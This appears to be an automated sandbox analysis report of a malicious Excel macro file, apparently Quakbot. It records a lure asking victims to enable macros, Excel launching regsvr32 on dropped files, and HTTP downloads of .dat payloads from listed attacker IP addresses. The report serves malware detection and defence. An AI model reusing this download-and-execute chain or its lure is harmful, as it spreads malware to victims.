Loading ...

Play interactive tourEdit tour

Windows Analysis Report Permission-40776837-06252021.xlsm

Overview

General Information

Sample Name:Permission-40776837-06252021.xlsm
Analysis ID:440654
MD5:2cd2fd004b5589a595239f202ac648ae
SHA1:ac02da8a953fd89f325c64bf5df93e415350ec12
SHA256:ad3071800cd6852215e7ffcc6c65e7104e3d6e10bccfffc8249d73be0512d6dd
Tags:xlsm
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:64
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Sigma detected: Microsoft Office Product Spawning Windows Shell
IP address seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Uses a known web browser user agent for HTTP communication

Classification

Process Tree

  • System is w7x64
  • EXCEL.EXE (PID: 1464 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • regsvr32.exe (PID: 1980 cmdline: regsvr32 ..\Kro.fis MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3064 cmdline: regsvr32 ..\Kro.fis1 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
    • regsvr32.exe (PID: 3028 cmdline: regsvr32 ..\Kro.fis2 MD5: 59BCE9F07985F8A4204F4D6554CFF708)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: regsvr32 ..\Kro.fis, CommandLine: regsvr32 ..\Kro.fis, CommandLine|base64offset|contains: ,, Image: C:\Windows\System32\regsvr32.exe, NewProcessName: C:\Windows\System32\regsvr32.exe, OriginalFileName: C:\Windows\System32\regsvr32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 1464, ProcessCommandLine: regsvr32 ..\Kro.fis, ProcessId: 1980

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileA
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe
Source: global trafficTCP traffic: 192.168.2.22:49169 -> 185.183.99.120:80
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 185.240.103.219:80
Source: Joe Sandbox ViewIP Address: 190.14.37.3 190.14.37.3
Source: Joe Sandbox ViewIP Address: 185.183.99.120 185.183.99.120
Source: global trafficHTTP traffic detected: GET /44372.7795725694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 185.240.103.219
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 190.14.37.3
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: unknownTCP traffic detected without corresponding DNS query: 185.183.99.120
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\83F8E7CF.jpgJump to behavior
Source: global trafficHTTP traffic detected: GET /44372.7795725694.dat HTTP/1.1Accept: */*UA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 185.183.99.120Connection: Keep-Alive
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: regsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: regsvr32.exe, 00000003.00000002.2228124469.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2208878206.0000000001D40000.00000002.00000001.sdmpString found in binary or memory: http://servername/isapibackend.dll
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: regsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmpString found in binary or memory: http://www.%s.comPA
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing from the ' yellow bar above. 21 22 G) PROTECTED VIEW Be careful-files from the In
Source: Screenshot number: 4Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A EC DO I '0
Source: Screenshot number: 8Screenshot OCR: Enable Editing from the 19 ' yellow bar above. 21 :: G) PROTECTED VIEW Be careful-files from th
Source: Screenshot number: 8Screenshot OCR: Enable Content 30 31 32 33 34 35 36 37 38 , Id 1 p pi Sheetl i q |1|| P A mMWj
Source: Document image extraction number: 0Screenshot OCR: Enable Editing from the yellow bar above. PROTECTED VIEW Be careful-files from the Internet can
Source: Document image extraction number: 0Screenshot OCR: Enable Content
Source: Document image extraction number: 1Screenshot OCR: Enable Editing from the yellow bar above. (i) PROTECTED VIEW Be careful-files from the Internet ca
Source: Document image extraction number: 1Screenshot OCR: Enable Content
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: Permission-40776837-06252021.xlsmInitial sample: EXEC
Source: regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal64.expl.evad.winXLSM@7/7@0/3
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\~$Permission-40776837-06252021.xlsmJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRB96F.tmpJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Windows\System32\regsvr32.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\regsvr32.exe regsvr32 ..\Kro.fis2
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: Permission-40776837-06252021.xlsmInitial sample: OLE zip file path = xl/media/image1.jpg
Source: Permission-40776837-06252021.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
Source: Permission-40776837-06252021.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\regsvr32.exe TID: 2224Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1616Thread sleep time: -60000s >= -30000s
Source: C:\Windows\System32\regsvr32.exe TID: 1604Thread sleep time: -60000s >= -30000s

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting1Path InterceptionProcess Injection1Masquerading1OS Credential DumpingVirtualization/Sandbox Evasion1Remote ServicesData from Local SystemExfiltration Over Other Network MediumNon-Application Layer Protocol1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution22Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryFile and Directory Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothApplication Layer Protocol11Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Virtualization/Sandbox Evasion1Security Account ManagerSystem Information Discovery2SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferProtocol ImpersonationSIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting1LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
Permission-40776837-06252021.xlsm5%VirustotalBrowse
Permission-40776837-06252021.xlsm4%ReversingLabsDocument-Office.Backdoor.Quakbot

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.%s.comPA0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://servername/isapibackend.dll0%Avira URL Cloudsafe
http://185.183.99.120/44372.7795725694.dat0%Avira URL Cloudsafe

Domains and IPs

Contacted Domains

No contacted domains info

Contacted URLs

NameMaliciousAntivirus DetectionReputation
http://185.183.99.120/44372.7795725694.datfalse
  • Avira URL Cloud: safe
unknown

URLs from Memory and Binaries

NameSourceMaliciousAntivirus DetectionReputation
http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkregsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpfalse
    high
    http://www.windows.com/pctv.regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpfalse
      high
      http://investor.msn.comregsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpfalse
        high
        http://www.msnbc.com/news/ticker.txtregsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpfalse
          high
          http://www.%s.comPAregsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          low
          http://www.icra.org/vocabulary/.regsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpfalse
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          • URL Reputation: safe
          unknown
          http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000003.00000002.2229021048.0000000003A80000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2210037674.0000000003A40000.00000002.00000001.sdmpfalse
            high
            http://windowsmedia.com/redir/services.asp?WMPFriendly=trueregsvr32.exe, 00000003.00000002.2231497023.0000000004AF7000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213714702.0000000004B37000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193970779.0000000004AB7000.00000002.00000001.sdmpfalse
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            • URL Reputation: safe
            unknown
            http://www.hotmail.com/oeregsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpfalse
              high
              http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2228124469.0000000001CC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2208878206.0000000001D40000.00000002.00000001.sdmpfalse
              • Avira URL Cloud: safe
              low
              http://investor.msn.com/regsvr32.exe, 00000003.00000002.2231078852.0000000004910000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2213453885.0000000004950000.00000002.00000001.sdmp, regsvr32.exe, 00000005.00000002.2193608318.00000000048D0000.00000002.00000001.sdmpfalse
                high

                Contacted IPs

                • No. of IPs < 25%
                • 25% < No. of IPs < 50%
                • 50% < No. of IPs < 75%
                • 75% < No. of IPs

                Public

                IPDomainCountryFlagASNASN NameMalicious
                190.14.37.3
                unknownPanama
                52469OffshoreRacksSAPAfalse
                185.183.99.120
                unknownNetherlands
                60117HSAEfalse
                185.240.103.219
                unknownRussian Federation
                57724DDOS-GUARDRUfalse

                General Information

                Joe Sandbox Version:32.0.0 Black Diamond
                Analysis ID:440654
                Start date:25.06.2021
                Start time:18:42:19
                Joe Sandbox Product:CloudBasic
                Overall analysis duration:0h 6m 42s
                Hypervisor based Inspection enabled:false
                Report type:light
                Sample file name:Permission-40776837-06252021.xlsm
                Cookbook file name:defaultwindowsofficecookbook.jbs
                Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                Number of analysed new started processes analysed:8
                Number of new started drivers analysed:0
                Number of existing processes analysed:0
                Number of existing drivers analysed:0
                Number of injected processes analysed:0
                Technologies:
                • HCA enabled
                • EGA enabled
                • HDC enabled
                • AMSI enabled
                Analysis Mode:default
                Analysis stop reason:Timeout
                Detection:MAL
                Classification:mal64.expl.evad.winXLSM@7/7@0/3
                EGA Information:Failed
                HDC Information:Failed
                HCA Information:
                • Successful, ratio: 100%
                • Number of executed functions: 0
                • Number of non-executed functions: 0
                Cookbook Comments:
                • Adjust boot time
                • Enable AMSI
                • Found application associated with file extension: .xlsm
                • Found Word or Excel or PowerPoint or XPS Viewer
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Found warning dialog
                • Click Ok
                • Attach to Office via COM
                • Scroll down
                • Close Viewer
                Warnings:
                Show All
                • Max analysis timeout: 220s exceeded, the analysis took too long
                • Exclude process from analysis (whitelisted): dllhost.exe, svchost.exe

                Simulations

                Behavior and APIs

                TimeTypeDescription
                18:43:28API Interceptor3x Sleep call for process: regsvr32.exe modified

                Joe Sandbox View / Context

                IPs

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                190.14.37.3Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.7746763889.dat
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.7722377315.dat
                Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.7698814815.dat
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.7671056713.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3/44372.5879460648.dat
                185.183.99.120Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.7746763889.dat
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.7722377315.dat
                Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.7698814815.dat
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.7671056713.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.183.99.120/44372.5879460648.dat
                185.240.103.219Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219/44372.593127662.dat
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219/44372.5879460648.dat

                Domains

                No context

                ASN

                MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                DDOS-GUARDRUPermission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 185.240.103.219
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                Decline-172917164-06242021.xlsmGet hashmaliciousBrowse
                • 5.253.62.174
                ForceNitro.exeGet hashmaliciousBrowse
                • 185.178.208.135
                PO#8076.exeGet hashmaliciousBrowse
                • 185.129.100.112
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                Cancellation_Letter_2137859823_06112021.xlsmGet hashmaliciousBrowse
                • 185.240.103.162
                jebDtHCePK9feGL.exeGet hashmaliciousBrowse
                • 185.129.100.112
                EDS03932,pdf.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                PO_29_00412.exeGet hashmaliciousBrowse
                • 185.178.208.160
                12042021493876783,xlsx.exeGet hashmaliciousBrowse
                • 185.178.208.160
                Ref. PDF IGAPO17493.exeGet hashmaliciousBrowse
                • 5.253.61.31
                AxR7BY4wzz.exeGet hashmaliciousBrowse
                • 185.178.208.189
                SecuriteInfo.com.Trojan.Siggen12.41502.7197.exeGet hashmaliciousBrowse
                • 185.178.208.189
                OffshoreRacksSAPAPermission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
                • 190.14.37.3
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                4cDyOofgzT.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                341288734918_06172021.xlsmGet hashmaliciousBrowse
                • 190.14.37.2
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
                Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
                • 190.14.37.135
